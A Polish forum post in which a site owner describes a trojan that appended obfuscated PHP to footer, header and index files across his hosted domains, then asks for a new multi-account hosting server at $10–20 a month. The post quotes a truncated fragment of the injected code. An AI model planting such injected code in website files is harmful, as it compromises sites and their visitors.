Posiadam (jeszcze) hosting na servage.net. "Jeszcze" dlatego, że muszę dokonać zmiany. Mam tam jedno konto na którym trzymam kilkanaście domen. Niestety parę dni temu wdarł się tam wirus/trojan który w każdym pliku zawierającym w nazwie "footer", "header" lub "index" (php) dodał na samym końcu wpis typu:
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB
Pobranie wszystkich plików i katalogów zajmie mi masę czasu (mam tam prężnie działające forum na ipb). Niestety servage nie może spakować mojego konta do jednego pliku ZIP abym pobrał to szybciej. W związku z tym będę zmieniał serwer i proszę o poradę
Potrzebuję serwera gdzie:
- mogę zakładać indywidualne konta dla moich klientów (jeżeli na którymś koncie pojawi się wirus - nie będzie miało to wpływu na pozostałe konta - tak jak miałem to do tej pory
- mogę dodać kilkanaście (najlepiej nieograniczoną ilość) domen i subdomen
- tworzenie kont FTP (możliwość utworzenia kilku kont FTP do jednego konta danego użytkownika/klienta)
- tworzenie baz danych MySql (również z dostępem zdalnym)
- transfer i pojemność najlepiej nieograniczona (choć niekoniecznie)
- cena 10$-20$ miesięcznie
W skrócie - potrzebuję przenieść wszystko z Servage na nowy serwer tak abym mógł stworzyć konta dla użytkowników. Jeżeli u kogoś pojawi się stary skrypt przez który wejdzie jakiś wirus/robot/trojan itp. - nie będzie miał on dostępu do pozostałych kont.